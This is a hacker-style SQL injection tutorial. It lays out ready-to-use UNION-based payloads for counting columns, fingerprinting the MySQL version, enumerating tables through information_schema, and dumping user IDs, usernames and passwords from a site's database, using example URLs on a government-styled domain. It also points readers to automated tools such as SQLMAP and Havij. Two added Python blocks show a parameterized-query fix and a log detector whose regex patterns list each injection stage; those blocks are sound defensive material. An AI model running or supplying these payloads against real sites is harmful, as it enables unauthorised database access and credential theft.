- HOW TO MANUAL SQL INJECT
- ██████████████████████████████████████████████████
- Credits
- http://twitter.com/urbackdoored
- ██████████████████████████████████████████████████
- Table of Contents
- 1.) [Finding SQL Injectable sites]
- 2.) [Retrieving columns]
- 3.) [Retrieving vulnerable columns]
- 4.) [Checking for the type of MySQL version]
- 5.) [Retrieving table names]
- 7.) [Retrieving data from columns]
- 8.) [Automatically SQL injecting]
- ██████████████████████████████████████████████████
- Finding SQL Injectable Sites
- Please, God forbid using "google dorks"; for a beginner it's especially bad!
- There are plenty of SQL injection scanners developed in C, C++, C#, Perl,
- Python, Java, & PHP. Using google dorks at this point should not be your
- course.
- ██████████████████████████████████████████████████
- Retrieving Columns
- Your payload will be; +order+by+(number)--
- Note; your "number" can be changed from 1-15; wait until it shows an error.
- It will look like; http://fuckfbi.gov/hacked.php?id=420+order+by+(1)--
- ██████████████████████████████████████████████████
- Retrieving Vulnerable Columns
- Your payload; +union+select+1,2,3,4--
- Note; 1,2,3,4 should be changed to the columns you found with the payload "+order+by+(number)--"
- Note; in the "id=420" part of your link you will need to change the number to "null"
- It will look like; http://fuckfbi.gov/hacked.php?id=null+union+select+1,2,3,4--
- ██████████████████████████████████████████████████
- Checking for MySQL Version
- Your payload; @@version--
- Note; you will need the link you just used to retrieve the vulnerable columns
- It will look like; http://fuckfbi.gov/hacked.php?id=null+union+select+1,2,3,@@version--
- Note; Replace the vulnerable column number with our payload
- ██████████████████████████████████████████████████
- Retrieving Table Names
- Your payload; group_concat(table_name,0x0a)+from+information_schema.tables+where+table_schema=database()--
- Note; you will need the link from checking for MySQL version
- It will look like; http://fuckfbi.gov/hacked.php?id=null+union+select+1,2,3,group_concat(table_name,0x0a)+from+information_schema.tables+where+table_schema=database()--
- Note; replace the "@@version--" payload with ours
- ██████████████████████████████████████████████████
- Retrieving Data From Columns
- Your payload; 1,group_concat(ID,0x3a,username,0x3a,password,0x0a),3,4,5,6,7,8,9,10,11,12,13+from+users--
- Note; "users" will need to be changed to the table with the juicy information you want, and it will be displayed on the webpage.
- It will look like; null+union+select+1,group_concat(ID,0x3a,username,0x3a,password,0x0a),3,4,5,6,7,8,9,10,11,12,13+from+users--
- Note; At this point you should have learned manual SQL injecting. It's the easiest tutorial I could make.
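Why the steps above work, and the fix, as an added example that is not part of the original paste: the `id` parameter is concatenated into the SQL text and so gets parsed as SQL, while binding it as a parameter keeps it as data. The `articles` table, the function names and the in-memory SQLite database (standing in for the MySQL backend) are assumptions made for the illustration.

```python
import sqlite3

QUERY = "SELECT id, title, body, author FROM articles WHERE id = "

def make_db():
    """Constructed sample data; in-memory SQLite stands in for the MySQL backend."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles "
               "(id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT)")
    db.execute("INSERT INTO articles VALUES (420, 'Hello', 'First post', 'admin')")
    return db

def fetch_vulnerable(db, raw_id):
    # BEFORE: the request parameter is pasted into the statement text, so any
    # ORDER BY / UNION fragment it carries becomes part of the query.
    return db.execute(QUERY + raw_id).fetchall()

def fetch_hardened(db, raw_id):
    # AFTER: the value is bound with a placeholder and is never parsed as SQL.
    # The digit check is defence in depth on top of the binding.
    if not (raw_id.isascii() and raw_id.isdigit()):
        return []  # a real handler would answer HTTP 400 here
    return db.execute(QUERY + "?", (int(raw_id),)).fetchall()

def error_reaches_caller(fetch, db, raw_id):
    """True when a database error propagates; the ORDER BY step relies on that signal."""
    try:
        fetch(db, raw_id)
        return False
    except sqlite3.Error:
        return True

if __name__ == "__main__":
    db = make_db()
    injected = "null union select 1,2,3,4--"   # URL-decoded form of the page's payload
    print("vulnerable:", fetch_vulnerable(db, injected))
    print("hardened:  ", fetch_hardened(db, injected))
    print("error leak:", error_reaches_caller(fetch_vulnerable, db, "420 order by 5--"))
```

Returning a generic error page instead of the database error also removes the signal the column-count step depends on, but only the parameter binding removes the injection itself.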
- ██████████████████████████████████████████████████
- Automatically SQL Injecting
- There are programs such as SQLMAP, Havij, SQLNinja, & DBDROP that will automatically breach the database for you.
- But learning the original way is always best for knowledge of what's happening.
- If you're a leech & a skid you can go on & use them automatically, but when someone asks about your
- knowledge of it don't come back to my tutorial LOL. -Chris Poole
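Detection-side view of the walkthrough, as an added example that is not part of the original paste: each step leaves a recognisable query string in the web server's access log, whether it was typed by hand or sent by one of the tools named above. The log lines are constructed, and the stage names and function names are labels chosen for this example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# One pattern per step of the walkthrough; stage names are labels for this example.
STAGES = {
    "column_count_probe":  re.compile(r"\border\s+by\s+\(?\d+\)?", re.I),
    "union_select":        re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "version_fingerprint": re.compile(r"@@version|\bversion\s*\(", re.I),
    "schema_enumeration":  re.compile(r"\binformation_schema\b", re.I),
    "concat_dump":         re.compile(r"\bgroup_concat\s*\(", re.I),
}
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+)')

# Constructed access-log lines (Common Log Format, documentation IP range).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /hacked.php?id=420 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /hacked.php?id=420+order+by+(5)-- HTTP/1.1" 500 0',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /hacked.php?id=null+UNION/**/SELECT+1,2,3,@@version-- HTTP/1.1" 200 530',
    '203.0.113.9 - - [01/Jan/2024:10:00:14 +0000] "GET /hacked.php?id=null%20union%20select%201,2,3,group_concat(table_name,0x0a)%20from%20information_schema.tables-- HTTP/1.1" 200 900',
]

def normalise(query):
    """Reduce a raw query string to the text the SQL parser would see."""
    text = unquote_plus(unquote_plus(query))  # '+', %20 and double encoding
    text = INLINE_COMMENT.sub(" ", text)      # union/**/select
    return re.sub(r"\s+", " ", text)

def classify(request_target):
    """Return the walkthrough stages whose pattern appears in the query string."""
    text = normalise(urlsplit(request_target).query)
    return [name for name, rx in STAGES.items() if rx.search(text)]

def scan(log_lines):
    """Return (client_ip, stages) for every log line with at least one hit."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        stages = classify(m.group(1)) if m else []
        if stages:
            hits.append((line.split()[0], stages))
    return hits
```

Pattern matching on logs is triage rather than a control: it tells you which parameters are being probed and by whom, while the fix remains on the application side.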